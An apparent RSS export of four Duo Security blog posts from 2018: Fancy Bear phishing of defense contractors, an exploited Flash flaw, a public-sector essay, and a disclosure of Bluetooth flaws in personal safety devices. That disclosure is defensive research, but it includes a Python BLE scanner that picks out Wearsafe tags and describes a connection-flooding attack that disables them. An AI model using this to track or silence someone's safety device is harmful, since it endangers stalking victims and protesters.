<![CDATA[The Duo Blog]]> https://duo.com/ Duo's Trusted Access platform verifies the identity of your users with two-factor authentication and security health of their devices before they connect to the apps you want them to access. Tue, 13 Feb 2018 12:04:00 -0500 en-us info@duosecurity.com (Amy Vazquez) Copyright 2018 3600 <![CDATA[Cloud and Aerospace Defense Contractors Targeted by Phishing Emails]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/cloud-and-aerospace-defense-contractors-targeted-by-phishing-emails https://duo.com/blog/cloud-and-aerospace-defense-contractors-targeted-by-phishing-emails Industry News Tue, 13 Feb 2018 12:04:00 -0500

Last week, the Associated Press (AP) reported that the Fancy Bear hacking group targeted at least 87 employees working for U.S. defense contractors via personal Gmail accounts and some corporate email accounts. Fancy Bear is said to be associated with a Russian military intelligence agency, according to several information security firms.

According to the report, both small and large defense companies were targeted, including key contractors working on advanced technology for militarized drones, missiles, rockets, stealth fighter jets and cloud computing platforms. The AP reported that 15 people who worked on drones were targeted.

A successful compromise could put proprietary company data - such as advancements in drone and weapons research - and U.S. defense interests at risk. The AP's analysis of phishing data collected by SecureWorks found that 40 percent of the victims clicked on phishing links (the sample consisted of 19,000 lines of "email phishing data" from March 2015 to May 2016).

One CEO of an intelligence and aerial systems firm clicked on an email disguised as a Google security alert in his inbox - but stopped short of entering his credentials when he realized it was a phishing scam. Other specific targets included a drone sensor specialist, an electronics engineer for batteries and drones, and a senior engineer at one of the largest aerospace companies in the U.S.

In addition to targeting aerospace and drone companies, the hacking group also went after the Gmail accounts of a compliance officer and operations manager of cloud computing services. They also targeted another federal service provider that helps the FBI and other intelligence agencies with high-speed storage networks, data analysis and cloud computing.

While it can be difficult to secure or manage the personal email accounts of employees, there are a few simple best information security practices that can help mitigate the potential effects of a phishing attempt:

  • Ensuring User Trust - Nowadays, stolen passwords and spoofed network addresses mean attackers can impersonate legitimate users and fly under the radar within company networks. Strengthening authentication by adding in multiple factors (multi-factor authentication or two-factor authentication) helps secure access to accounts.
  • Ensuring Device Trust - Checking the security health of every endpoint that logs in to company applications can protect against threats or malware that exploit vulnerabilities in out-of-date software.
  • Strong Access Policies - To protect access to critical applications and data, set up device certificates that help you identify corporate-owned vs. personal devices, and create strong access policies to block or warn users about devices that don’t meet your company’s security standards. A simple policy sketch follows this list.
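
To make this concrete, here is a minimal, hypothetical Python sketch of how an access decision might combine user verification with device health; the attribute names and rules are illustrative assumptions, not any particular vendor's policy engine.

# Hypothetical access-policy sketch: the attributes and rules below are
# illustrative assumptions, not any vendor's real policy engine.
from dataclasses import dataclass

@dataclass
class LoginAttempt:
    mfa_verified: bool        # did the user complete a second factor?
    corporate_device: bool    # identified via a device certificate?
    os_up_to_date: bool       # reported by an endpoint health check
    plugins_up_to_date: bool  # browser plugins such as Flash or Java

def access_decision(attempt: LoginAttempt) -> str:
    if not attempt.mfa_verified:
        return "deny"  # user trust was never established
    if not (attempt.os_up_to_date and attempt.plugins_up_to_date):
        # Device trust not established: warn on personal devices so the user
        # can self-remediate; deny managed devices until IT updates them.
        return "warn" if not attempt.corporate_device else "deny"
    return "allow"

print(access_decision(LoginAttempt(True, False, True, False)))  # -> "warn"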

Data Security Standards for Contractors

The Dept. of Defense (DoD) has extended its Jan. 1 deadline requiring contractors to have a plan in place to comply with NIST's (National Institute of Standards and Technology) Special Publication 800-171, the standards contractors should follow when handling controlled unclassified information.

A proposed rule would also require civilian contractors to comply with the NIST guidelines, with a public comment period open from April to June 2018. The General Services Administration (GSA) is also tightening requirements for reporting cybersecurity breaches, among other proposals listed in a Federal Register Notice from January.

One reason to standardize data handling systems is to make data sharing more secure and convenient (eliminating the need for risk assessments and sharing agreements) as information travels from one agency to another, as Federal News Radio reports. Another reason is to standardize the protection of information as it moves from the federal space to the non-federal.

For small manufacturers, the DoD provides a high-level, plain-language guide to its cybersecurity requirements, outlining what they must do and why, including reporting breaches within 72 hours. Read the What Small Manufacturers Need to Know FAQ (PDF) for more information.

To help protect against threats posed by phishing attempts similar to the ones launched by Fancy Bear, the NIST SP 800-171 basic security requirements include section 3.5 on Identification and Authentication:

  • 3.5.1 - Identify system users, processes acting on behalf of users, and devices.
  • 3.5.2 - Authenticate (or verify) the identities of those users, processes, or devices, as a prerequisite to allowing access to organizational systems.

As well as a number of derived security requirements, including:

  • 3.5.3 - Use multi-factor authentication for local and network access to privileged accounts and for network access to non-privileged accounts.

Check out the complete list of NIST 800-171 (PDF) requirements to learn about the fourteen security requirement families, including access control, awareness and training, incident response and more.

]]>
<![CDATA[No Patch Yet: Flash Vulnerability Exploited in the Wild]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/no-patch-yet-flash-vulnerability-exploited-in-the-wild https://duo.com/blog/no-patch-yet-flash-vulnerability-exploited-in-the-wild Industry News Fri, 02 Feb 2018 00:00:00 -0500

There are many, many Adobe Flash Player vulnerabilities (at least 1,045 reported ones listed in CVE Details), but one recent bug is reportedly being actively exploited by attackers - and there's no fix yet.

Adobe will release an update in a few days ("planned for the week of February 5"), but the best advice now is to disable or uninstall Flash. Another fix for administrators may be to enable click-to-play for Flash in users' browsers. Last year, Google disabled Flash by default in the Chrome browser. Mozilla also blocked it in Firefox in 2015, while Microsoft has enabled click-to-play for Flash in the Edge browser.

However, users browsing with old or out-of-date browsers (like Internet Explorer) and out-of-date plugins like Flash are especially vulnerable to bugs they haven’t yet patched on their systems. An Adobe security advisory warns that the critical vulnerability (CVE-2018-4878) affects Flash version 28.0.0.137 and earlier, and that an attacker could take control of an affected system.

CVE-2018-4878 Exploited in the Wild

As reported by Threatpost, the South Korean Computer Emergency Response Team issued a warning on Wednesday about attacks targeting South Koreans. The exploit uses a malicious Flash SWF file embedded in Microsoft Word documents - if a user opens a malicious document, web page or spam email containing the Flash file, an attacker could compromise their system.

In October, Adobe released an out-of-band (meaning, outside of their usual Patch Tuesday schedule) patch in response to another critical vulnerability that was being exploited in the wild, used in targeted attacks against Windows users. CVE-2017-11292 allowed for remote code execution.

Prevalence of Out-of-Date Flash Plugins

In Duo's 2017 Trusted Access Report: The Current State of Endpoint Security, the percentage of enterprise endpoints running an out-of-date version of Flash increased from 42% in 2016 to 53% in 2017. Flash is most often out of date on IE (58%) and most often up to date on the Chrome browser (65%).

Duo 2017 Trusted Access Report: Flash Trends

The report looks at all endpoints used to log into and access enterprise applications and resources, including both corporate-owned and personal devices.

Personal devices can be cause for more concern as remote and mobile workers continue to blur the lines between work and personal computing, often using personal smartphones, laptops, tablets, PCs and more to access work resources (typically web-based applications, where data is stored virtually in the cloud).

Protecting Against A Compromise via Flash

Some point to ad blocking in browsers as a way to curb the threat of exploitation via Flash malvertisements, as described in Decent Security's Adblocking for Internet Explorer Without an Extension: Enterprise Deployment.

Blocking advertising has multiple security and performance benefits to clients. Ads are especially dangerous to corporate computers, which often run outdated plugins that can be exploited by malvertising.

Adobe has also recommended:

Beginning with Flash Player 27, administrators have the ability to change Flash Player’s behavior when running on Internet Explorer on Windows 7 and below by prompting the user before playing SWF content. For more details, see this administration guide.

And ultimately, Adobe will be sunsetting Flash in 2020:

...in collaboration with several of our technology partners – including Apple, Facebook, Google, Microsoft and Mozilla – Adobe is planning to end-of-life Flash. Specifically, we will stop updating and distributing the Flash Player at the end of 2020 and encourage content creators to migrate any existing Flash content to these new open formats.

However, remote users or those using personal devices to access work applications may not be subject to group policies put in place by administrators. By using an endpoint and authentication solution that can give you insight into corporate vs. personal devices, you can create more granular access policies to ensure only 'trusted' (or secure) devices can access corporate apps.

For example, you might set a device access policy that blocks all personal devices running an out-of-date version of Flash, warning users to update their plugins in order to gain access.
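
As a rough sketch of what such a policy might look like in practice, the snippet below compares a reported Flash plugin version against a minimum allowed version; the threshold used here is an assumption for the example, not a value taken from Adobe's advisory.

# Illustrative version-based device policy check (values are assumptions).
MINIMUM_FLASH = (28, 0, 0, 161)  # placeholder for whatever patched build you require

def parse_version(version: str) -> tuple:
    """Turn a dotted version string like '28.0.0.137' into a comparable tuple."""
    return tuple(int(part) for part in version.split("."))

def flash_policy(reported_version: str, corporate_device: bool) -> str:
    if parse_version(reported_version) >= MINIMUM_FLASH:
        return "allow"
    # Out-of-date plugin: block personal devices outright, warn corporate
    # ones so IT can push the update through existing management tools.
    return "warn" if corporate_device else "block"

print(flash_policy("28.0.0.137", corporate_device=False))  # -> "block"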

This new approach to enterprise security can help provide more contextual security against threats that lie beyond the perimeter of traditional defenses, and ensure the trust of both the user and their device.

]]>
<![CDATA[Everything is Changing: A Modern Security Model for the Public Sector]]> srazier@duo.com(Sean Frazier) https://duo.com/blog/everything-is-changing-a-modern-security-model-for-the-public-sector https://duo.com/blog/everything-is-changing-a-modern-security-model-for-the-public-sector Industry News Tue, 30 Jan 2018 08:30:00 -0500

I thought it might be worthwhile to provide some insight as to why I recently joined Duo as the Advisory CISO for the Public Sector. Duo will have a very significant influence on the next wave of cybersecurity in the public sector. Furthermore, Duo has the potential to help the government do what it has desperately been trying to do - move to the cloud and mobile, quickly. That’s personally and professionally exciting for me.

For me, the writing is on the wall. First, I believe a few things to be true:

  1. Public Sector will ultimately move away from the data center business. Everything will be “cloud.” Cost, simplicity and missions will require this change - sooner rather than later.
  2. Mobile will consume the desktop whole - iOS, Android, Windows 10… all popular mobile OSes.
  3. Items 1 and 2 will eliminate any need for a traditional ‘perimeter.’

Duo is helping to usher in a new security paradigm through modern multi-factor authentication (MFA). The security model we all grew up on (VPNs, firewalls, etc.) struggles to keep up with this “cloud-first,” “always-connected” world we find ourselves in.

Some funny things happened along this road.

First, to quote Justin Timberlake, Apple brought the PKI (public key infrastructure) sexy back. When Apple built the iOS security model, it relied heavily on PKI for hard security functions, like application and code signing, as well as its trusted boot architecture. It put a whole lot of security power underneath a pretty touch UI. Thankfully, the end user has never really been exposed to the complexities of PKI. Apple made it easy. However, anyone who has worked in the federal market before has had exposure to PKI and its complexities.

To me, SSL has always been the most successful example of a PKI use case. SSL was easy to deploy (for the most part) and didn’t require the end user to jump through hoops in order to use it. Apple’s implementation is not only another elegant example of PKI in use, but it’s at scale, at a massive scale.

Second, mobile begets cloud and cloud begets mobile. This self-propagating “ecosystem” has brought power to app developers in the commercial world - agility, speed to market, whatever. This trend started in the consumer world and has brought this exact same power to the enterprise over the past many years. Public sector agencies are just now starting to realize some of these “powers” and need help to keep up.

So…..

I see Duo doing the exact same thing for enterprise security. Our very ethos is that security should be equivalent to a “dial-tone.” It needs to be easy and available. It needs to be easy for users to access and easy for enterprises to deploy.

Most importantly, security should not get in the way.

In future blogs, I’ll discuss specifically how Duo can assist the government in protecting its move to cloud. I will further discuss the concept of ‘perimeter-less’ networks and smart, mobile endpoints and how the two concepts provide agencies (and the government) the ability to do something it has been seeking to do - move faster to support missions, leverage COTS (Commercial Off The Shelf) technologies and solve hard security problems.

I’m excited to be at Duo and to help public sector agencies as they contemplate a move to a modern security model.

]]>
<![CDATA[Bluetooth and Personal Protection Device Security Analysis]]> mloveless@duosecurity.com(Mark Loveless) https://duo.com/blog/bluetooth-and-personal-protection-device-security-analysis https://duo.com/blog/bluetooth-and-personal-protection-device-security-analysis Duo Labs Wed, 24 Jan 2018 08:30:00 -0500

The TL;DR

Looking at the ROAR, Wearsafe and Revolar personal protection devices - commonly used by women for personal safety but increasingly by other segments of the population including protesters, human rights workers, and the like - we discovered a few flaws or “gotchas” involving Bluetooth for the Wearsafe and Revolar (ROAR looked good):

  • While it wasn’t nearly as easy to remotely track a Revolar owner, it is still possible to track the owner of either the Revolar or Wearsafe device from a distance via Bluetooth with inexpensive antennas that extend the scanning range.
  • Both devices allow for Bluetooth scanning to identify the device as a personal protection device.
  • Both devices allow for somewhat insecure Bluetooth pairing.
  • The Wearsafe product is subject to a denial of service attack that prevents the device from performing its main functions.

Background

Personal protection devices are small physical devices that allow users to discreetly press a button to signal to friends that they’re in a potentially dicey situation, particularly if the act of pulling out and using their phone would cause a situation to escalate to something more serious.

The small devices use Bluetooth to talk to the phone, and a companion app on that phone gathers GPS data and sends a warning message to a list of friends telling them where the user is. There are usually multiple alerts with different meanings:

  • This could involve a check-in (“I have arrived at a place and all is ok”)
  • A potential danger (“The place I am at looks fairly sketchy”)
  • Or immediate danger (“There is a bad person/situation confronting me, I am in immediate need of physical assistance”).

The alerts are triggered by pressing a button on the physical device, with one click meaning one thing and multiple clicks meaning something else.

The common scenarios are as follows:

  • The user is a woman, and she has been stalked by someone. While she is out, she either sees or is confronted by the stalker. She’s afraid that if she gets out her phone it might cause her stalker to rush and grab her phone before she can call a friend or 911. By discreetly pushing a button on her personal protection device, she can send a warning with her location without triggering a physical confrontation that could occur if she got out her phone.
  • A protester under a repressive regime is out marching. Suddenly, the protesters are surrounded by armed government thugs. If the protesters get out their phones, they might be arrested if it looks like they are filming the event or calling their friends. A discreet button press on a personal protection device can send a message to their friend with their location and that they are in danger. The friends could contact international press in the area to go investigate, based upon the GPS coordinates in the message.

As you can see, the security needs of these devices are slightly different from those of many other Internet of Things (IoT) devices. There are both stalking victims and human rights workers who are afraid to wear Fitbits because they might be tracked, so purchasing one of these devices should allow the wearer to not just feel more secure, but actually be more secure. Between that and the increased use amongst human rights workers in foreign lands and protesters under duress from repressive authorities, security is of the utmost importance.

The devices are similar in that they require the user to register with the vendor's website via the app, enroll recipients to receive notifications in the event that alerts are sent, and, of course, pair the button device to the phone via Bluetooth. There are multiple warnings that alert a recipient to a user's situation, ranging from a simple check-in to an all-out notification of immediate danger. All involve using the phone's GPS coordinates.

Methodology Used

When one approaches IoT, the most obvious thing is to go after the device itself and see if it can be compromised. In some cases, such as devices that are essentially small computers running a complete operating system, this makes sense: such devices usually operate autonomously and do not require frequent (or constant) communication with an app on a phone or a path to the cloud.

Other times, an IoT device is intended to either communicate directly with the app on the phone, or it needs to move data from itself to the cloud and will use the phone as its router. In those cases, the point of attack changes: by compromising a point on the communications path between app and cloud, or by compromising just the phone, you stand the chance of more “impact,” particularly when dealing with a group of users that have adopted a technology - you could potentially compromise the entire group.

In this examination, we are looking at the Bluetooth side of things. From a Bluetooth perspective, personal protection devices pose two potential areas of threat - they could be tracked at the individual level, and they could be rendered inoperative via a remote attacker. We look at both approaches.

What To Check

Here is the current checklist Duo Labs usually goes through:

  • Overall security stance of the device from a Bluetooth perspective.
  • Secure Bluetooth pairing.
  • Non-obvious names and values accessible via Bluetooth probing and scanning.
  • Bluetooth stack on device not vulnerable to a denial-of-service attack.
  • Design real-world attack scenarios, then try to connect the dots to see if they can be implemented using a combination of flaws found and existing limitations (or lack thereof) in the technology involved.

General Observations

There is an immediate issue with using Bluetooth as the method of communication between device and phone - for the device to function, it requires the phone to have Bluetooth enabled. Keep in mind that some of the women who have purchased this product were afraid that they could be tracked via their Fitbit (we learned this from a friend who has worked with abused and harassed women). Turning on Bluetooth on your phone can have some unintended consequences.

The Apple iPhone, when Bluetooth is enabled, seems to remain in discoverable mode even after leaving the Bluetooth setup screen. According to multiple sources, including some on Apple’s website, it leaves discoverable mode when you leave the Bluetooth screen; however, every Bluetooth scanner says otherwise.

This means that if you use an iPhone to pair your personal protection device, you’ve just opened up the iPhone itself to tracking. A typical stalker would certainly be able to track via the phone itself, whereas the personal protection devices on occasion will go into discoverable mode as a part of their normal operation.

A dedicated stalker would eventually see the personal protection device, put two and two together, and adjust tactics accordingly. Currently, the only way to disable discoverable mode on an iPhone is to disable Bluetooth altogether, which kind of defeats the purpose since you cannot use your personal protection device without Bluetooth.

Android phones could potentially do the same thing. However, by going into system settings (the exact location may vary depending on the version of your OS), discoverable mode can be turned off, and a timer can be set to turn discoverable mode back off if you’ve turned it on to pair with a device. The latest versions of the operating system already have discoverable mode turned off anyway, so the level of this particular risk is reduced.

Wearsafe

At first glance, the Wearsafe product works as designed. There is a cumbersome element that involves getting the recipients of your warnings to install the app, and you have to subscribe to the service (a few dollars per month) before you can even start registering recipients. That said, once configured, it does what it promises.

The Wearsafe Device Figure 1. The Wearsafe device.

Bluetooth

The Bluetooth pairing process between the phone and the Wearsafe device leaves something to be desired - as you pair, the phone prompts you to enter the numeric code that appears on the device, which, of course, has no display and shows no code.

However, the instructions state that the name of the Bluetooth device - in my case Tag-2292 - contains the numeric value for pairing. This means that instead of the hopelessly insecure “Just Works” method which essentially uses a hard-coded passkey of all zeroes, they are using the legacy 2.0 Bluetooth standard of a hard-coded 4-digit passkey, and they include the passkey in the Bluetooth device name.

Entering 2292 allowed the pairing. While I could change the name of the device in the app, this was not pushed down to or reflected on the device itself, which still advertised itself as Tag-2292. If they were going to do this, they could have simply gone with Just Works.

It should be noted that the serial number, verified by attaching to and querying the serial number GATT UUID (which starts with 0x00002a25), contains 2292 as the last four digits. Additionally, there was also a sticker on the underside of the lid of the Wearsafe device that had 2292 (see Figure 1).

Wearsafe Battery Figure 2. Underside of the Wearsafe battery cover.

As soon as you plug the battery into the device, it begins advertising via Bluetooth. It seems to advertise nearly continuously, although there would be stretches where (according to the scanner) it would stop for maybe an hour or so, but would resume and continue in discoverable mode for hours on end. For the most part, it was on and letting the world know about its existence.

With the manufacturer set to “Wearsafe Labs, Inc.” and a device name of Tag-xxxx, where xxxx is a four-digit number, it was more than easy to identify the device. With a free scanner app on a phone, the Wearsafe device was easily detected at close range, and using a laptop along with a larger antenna, one could easily detect the device from longer distances (up to a quarter mile away with a $50 antenna, further with a more powerful antenna). Coupled with a non-changing MAC address that always starts with 40:54:E4 - registered to Wearsafe Labs, Inc. - this makes it easy to track the device from a distance, which rather defeats the idea of having a stealth device.
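
As a rough illustration of how little tooling this takes, here is a minimal Python sketch of a BLE scan using the bleak library (an assumption - any scanner app or library would do), flagging advertisements whose name or MAC prefix matches what the Wearsafe device exposes.

# Minimal BLE scanning sketch (assumes the third-party "bleak" library).
# It lists nearby advertisements and flags ones that look like a Wearsafe
# tag based on the "Tag-xxxx" name and 40:54:E4 MAC prefix described above -
# the digits in the name double as the legacy pairing code.
import asyncio
from bleak import BleakScanner

async def scan(seconds: float = 10.0) -> None:
    devices = await BleakScanner.discover(timeout=seconds)
    for d in devices:
        name = d.name or ""
        if name.startswith("Tag-") or d.address.upper().startswith("40:54:E4"):
            print(f"Possible Wearsafe device: {d.address} ({name})")
        else:
            print(f"Other device: {d.address} ({name})")

asyncio.run(scan())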

Denial of Service

Regular types of denial of service did not impact the device, or at least did not initially seem to. The chip supports up to eight connections, so flooding the device with BLE connections did nothing as long as the connection with the paired phone was unbroken. However, once that phone connection dropped, the remaining connection slot was taken up and the device would not allow connectivity with the phone to be re-established.

Since the BLE connection attempts were never completed and disconnected properly, the device was locked up from use, including the ability to send alerts. The only way to recover the device (letting it sit for up to 4 hours did not work) was a hard reset by removing and reinserting the battery.

It should be noted that repeated attacks did cause the battery to drain slightly quicker, but not enough to consider it a viable attack. For example, if the battery life were to last 21 days, at most the attacks probably knocked 2-3 days off of the life of the battery. Repeated attacks would drain the battery more substantially, but with the denial of service this seemed to be an unnecessary attack.

Revolar

The app is easy to set up, and it takes less work to get things configured than the Wearsafe. Additionally, it does not require the friends you are notifying to download an app, as it relies on both email and SMS for notifications. In general, while the device is more expensive than the Wearsafe, the entire process was less painful.

Revolar Device Figure 3. The Revolar device.

Bluetooth

Bluetooth pairing is also an issue with Revolar. It will try to pair using Just Works, but the documentation states that if you are prompted for a passkey, you should use “1234” (falling back to legacy 2.0 standards). Not exactly secure, but Revolar does make up for it in another way.

Once the battery is inserted, the Revolar device does not immediately start broadcasting its existence via discovery mode. Instead, to pair with the device, you have to hold down the button for 12-15 seconds to enter discovery mode, and then it can be paired with the phone.

After it has been paired, it goes into discovery mode to talk to the phone for roughly 30 seconds every 60 minutes. Otherwise, it is not discoverable via traditional scans, and direct probes to the MAC address of the device were unanswered. While still not perfect, this is a much more secure method of a device living in a Bluetooth world.

The manufacturer was listed as “Texas Instruments” and the name was listed as “Revolar,” which means the device is still trackable via Bluetooth scanning, although going into discovery mode once an hour creates a much smaller window.

Revolar Battery Figure 4. Under the battery of the Revolar device.

Denial of Service

Attempts to cause the device to fail via denial of service did not work. Multiple attempts were made using a variety of techniques.

ROAR Personal Safety and Athena

The ROAR device, known as Athena, works with the ROAR Personal Safety app on your phone. Like the other two devices, it lets you trigger a couple of different alerts; however, Athena also has an alarm mode that clocks in at an impressive 90 dB with an attention-getting audio alert. This is a nice addition, as the user might be in a situation where drawing attention could be helpful in the event of a confrontation. So extra points for team ROAR for this.

Athena Device Figure 5. The dark gray Athena device, for use with the ROAR Personal Safety app.

Bluetooth

The pairing method is Just Works. Again, not really ideal, but at least there is no fallback to legacy 2.0 pairing. Like the Revolar, you have to trigger the device to start a pairing process, so this substantially reduces risk. That said, the security model implemented is rather impressive.

Athena has implemented the highest security settings, including LE Privacy, and this is in place before the device is even paired to the phone. Roughly every twenty minutes, a new MAC address is assigned. After pairing, if the Athena is triggered via a button press, the MAC address is cycled again. Even at the low level of Bluetooth, both privacy and security have been considered - most Bluetooth devices do not implement LE Privacy mode at all, so this is great to see.
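
For readers unfamiliar with LE Privacy, the advertised MAC is a resolvable private address: a random value plus a short hash computed with a secret Identity Resolving Key (IRK) shared only with paired devices. The sketch below is a simplified take on the ah() function from the Bluetooth Core Specification (glossing over byte-order details), showing why a scanner without the IRK cannot link the rotating addresses together.

# Simplified sketch of resolvable-private-address checking (LE Privacy).
# Byte ordering is glossed over; this illustrates the concept, not a
# drop-in implementation. Requires the third-party "cryptography" package.
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def ah(irk: bytes, prand: bytes) -> bytes:
    """Bluetooth address hash: AES-128-encrypt zero-padded prand, keep 3 bytes."""
    enc = Cipher(algorithms.AES(irk), modes.ECB()).encryptor()
    return (enc.update(bytes(13) + prand) + enc.finalize())[-3:]

def resolves(rpa: bytes, irk: bytes) -> bool:
    """In this sketch, an RPA is prand (3 bytes, top bits 0b01) followed by the hash (3 bytes)."""
    prand, hash_part = rpa[:3], rpa[3:]
    return ah(irk, prand) == hash_part

# Only a device holding the IRK from pairing can recognize the address; to
# everyone else, each rotation looks like an unrelated random MAC.
irk = bytes(range(16))        # placeholder key for the example
prand = b"\x42\x13\x37"
print(resolves(prand + ah(irk, prand), irk))   # -> True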

The usual probing of the device turned out to be impossible. Because Athena uses Secure Connection Only Mode, any connection requires authentication, and once paired, you cannot pair a second device. So the usual tricks of scanning the device with traditional Bluetooth hacking tools failed. Athena refused to give up any information at all.

Denial of Service

Like the Revolar, attempts to cause the Athena device to fail via denial of service did not work. Multiple attempts were made using a variety of techniques.

Comparison

Here is a breakdown of issues looked at, and issues found.

Possible Issue | Wearsafe | Revolar | ROAR (Athena)
Pairing method | Bluetooth 2.0 legacy 4-digit PIN | Bluetooth 4.0 “Just Works” with fallback to 2.0 legacy 4-digit PIN | Bluetooth 4.0 “Just Works”
Allows for multiple devices to pair | No | No | No
Bluetooth probing reveals too much info | Yes | Limited window, but yes | No
Trackable via scanning | Yes | Limited | No
Vulnerable to denial of service | Yes (flood of connections) | No | No
Uses additional security methods | No | Discovery mode enabled once per hour | Secure Connection Only Mode including LE Privacy

Vulnerability Summary

Wearsafe Vulnerable to Bluetooth Tracking.
Using a Bluetooth scanner, including free scanners available for phones, it is possible to physically track the wearer of a Wearsafe device. The device is easily identified via the manufacturer, “Wearsafe Labs Inc,” and the name “Tag-xxxx,” where xxxx is a four-digit number - the same number used in the pairing process.

CVE: None.

Recommendation to vendor: Only use discovery mode for pairing, and only periodically to check in via the phone app if needed. Implement Secure Connection Only Mode and LE Privacy from the Bluetooth specification - periodically rotate the MAC address used for advertising, and rotate it after every battery change. Change the manufacturer name to something less obvious. Disable legacy 2.0 pairing support.

User remediation: Remove the battery from the Wearsafe device until right before entering a physical space where you might be threatened. While this is vague and in many cases defeats the entire point of having the Wearsafe device to begin with, it is probably the best solution until a vendor fix is provided. If you are using iOS and have an Apple Watch, use Wearsafe's Apple Watch app instead of the device (the Apple Watch uses LE Privacy), which will prevent tracking.

Wearsafe Vulnerable to Denial of Service.
Under a heavy load of connection requests, if the device becomes disconnected from the phone it is paired to, an attacker can fill the connection table, rendering the device unable to re-establish communication with the phone without a hard reset (temporarily removing the device’s battery). There is no indication in the app that this has occurred. Subsequently, activation of an alert via the device fails to go through the phone, with no indication of alert delivery failure.

CVE: CVE-2017-11431.

Recommendation to vendor: Periodically time out spurious connections, perhaps more quickly when all connections are in use. Implementation of Secure Connection Only Mode will eliminate this issue.

User remediation: None. If the device is unable to connect to its paired phone, remove and replace the battery.

Revolar Vulnerable to Bluetooth Tracking.
Using a Bluetooth scanner, including free scanners available for phones, it is possible to physically track the wearer of a Revolar device. The device is easily identified via the name “Revolar.” In spite of the fact that discovery mode is used only periodically (once per hour), this still allows for a window in which tracking can occur.

CVE: None.

Recommendation to vendor: Implement Secure Connection Only Mode and LE Privacy from the Bluetooth specification - periodically rotate the MAC address used for advertising and after every battery change. Disable legacy 2.0 pairing support.

User remediation: Remove the battery from the Revolar device until right before entering a physical space where you might be threatened. While this is vague and in many cases defeats the entire point of having the Revolar device to begin with, it is probably the best solution until a vendor fix is provided.

ROAR Athena.
There were no issues outside of the pairing process, but even that is mitigated to the point of not being an issue.

Exploit Summary

Wearsafe

The main issue for the Wearsafe device is the denial of service, which, coupled with the ability to track the device, creates a rather nasty situation.

By scanning for Bluetooth devices, an attacker could recognize a Wearsafe device using inexpensive hacking tools, and could even detect a Wearsafe device from a distance with the proper antenna. Additionally, using the same hardware, it is possible to perform a denial of service by rapidly and repeatedly connecting to the device. Since Bluetooth, by nature, is not the most stable of communications, it will on occasion drop and then re-establish connections with paired devices.

A sustained connection attack against the Wearsafe device in a lab environment took advantage of this, and would result in the denial of service within 90 minutes on average. A dedicated attacker could locate the victim and launch the attack while the victim is stationary (at home in the evening, or while at their place of employment), even from a distance.

In the scenario of an attacker going after a victim, they can remotely disable the Wearsafe device and then simply use it as a tracking device to home in on the victim. The attacker would be well aware that any attempt to use the device to notify others simply would not work, and perhaps be emboldened by that.

During our testing and reporting to Wearsafe, they asked for a video showing the denial of service attack in action. While originally made just for them, we thought we’d link to an edited version of it here for those that are interested.

Revolar

The main issue for the Revolar is tracking of the device. While the window for tracking is slight, it is there, and it alerts an attacker that the potential victim is capable of remotely and quickly notifying others of their location. The main concern is that the attacker can adjust tactics (disguise, approaching from behind, quickly restraining hands, etc.) to account for the possibility of the victim actually using the device.

All Products

As stated previously, it should be noted that all three products - Wearsafe, Revolar, and ROAR - require Bluetooth to be active on the phone the device is paired to. If your concern is that you can be physically tracked via Bluetooth by your personal protection device, whether that personal protection device can actually be tracked or not may not matter.

If your phone is an Android, many models allow you to turn off “discoverable” mode, and in recent models, discoverable mode is off by default. For the iPhone, turning on Bluetooth puts the phone in Bluetooth’s discoverable mode with no way to turn it off. A device in discoverable mode can be tracked.

Emergency SOS iPhone Figure 6. Using the iPhone as a “personal protection device”.

For iPhone users, you could use your phone as a personal protection device of sorts by invoking Emergency SOS. If your iPhone is in your pocket, you could potentially get your hand in there and use SOS to get help. This also disables Touch ID, which has the somewhat morbid side effect of preventing an attacker - who just rendered you unconscious - from using your fingerprint to try to thwart actions the SOS triggered. It should also be noted that this negates the need to turn on Bluetooth, which would make your iPhone trackable.

Vendor Responses

Here is the vendor response to each reported vulnerability listed in the Vulnerability Summary section above.

Wearsafe

Oct. 18, 2017 - Contacted the vendor via email, 90 day clock started.
Oct. 25, 2017 - Wearsafe reported any vulnerability would be fixed in a future update.
Oct. 30, 2017 - Wearsafe requested a video demonstrating the vulnerability.
Nov. 01, 2017 - Video sent to Wearsafe, Wearsafe acknowledged and said they will work on the denial of service issue.
Nov. 09, 2017 - Wearsafe released an update to their app, version 1.10.2.
Jan. 05, 2018 - Have not received any further updates from Wearsafe, latest version appears to correct the Denial of Service issue. Assigned CVE ID.
Jan. 24, 2018 - Public release date.

Revolar

Oct. 18, 2017 - Contacted the vendor via email. No response.
Oct. 24, 2017 - We learned that Revolar filed for bankruptcy and shut down operations on September 25, 2017, and this was eventually made public on October 24, 2017. On the FAQ portion of their site was this answer: “Please refer to our knowledge center to find answers to frequently asked questions. We no longer have customer support personnel who can respond to support issues.”

The retailers that carried Revolar products - Target, Best Buy, Brookstone, and others - continued to sell the devices until they had depleted their stock. The service still worked as of this writing and they are trying to sell off their technology to another company, but there is no guarantee the service will continue for any extended length of time.

Did We Cover Your Product?

There are a number of personal protection devices on the market, and the market is constantly changing. We specifically covered products that include a physical device, as the model of discreet device activation (rather than pulling out the phone) was an interesting one. There are other products out there with devices, and there are dozens of app-only products that require one to interact with the phone (or, in some cases, a paired smart watch). If you are curious about one of these other products and have an urge to explore them as well, we do have a few resources to point you to:

Look at our analysis of a smart power tool, as it covers pulling apart applications and sniffing encrypted traffic by bypassing certificate pinning: Bug Hunting: Drilling Into the Internet of Things. Our Bluetooth hacking blog post covers tools and their use, and was written during the testing of the personal protection devices: Bluetooth Hacking Tools Comparison.

Our exploration of hardware was honed on the ROAR Athena device: Examining Personal Protection Devices: Hardware and Firmware Research Methodology in Action. Our Bluetooth security explanation covers the different modes of security and privacy settings: Understanding Bluetooth Security.

Summary

There are a couple of issues to keep in mind when purchasing IoT devices - particularly those with security implications like personal protection devices. First, the device may be subject to an attack, even a simple one like the denial of service against the Wearsafe Tag. If this were a smart toaster, no one would care and we probably wouldn’t even report it, but this particular type of vulnerability is the exact wrong thing for such a device to have.

Second, a number of small startups like the Revolar seem great, only to go out of business in spite of having a decent product that is shipping. While it is hard to determine what the future may hold for any IoT device, it is a harsh reminder that it is a tough market filled with lots of promise and shiny newness that often fails, sometimes unexpectedly.

Given the patching, we’re willing to recommend either the Wearsafe Tag or the ROAR Athena. For the Wearsafe product, if you have the Apple Watch, you might consider using that in place of the tag as the Apple Watch Wearsafe app is riding on a much more secure platform, placing it much closer to the ROAR model in terms of security.

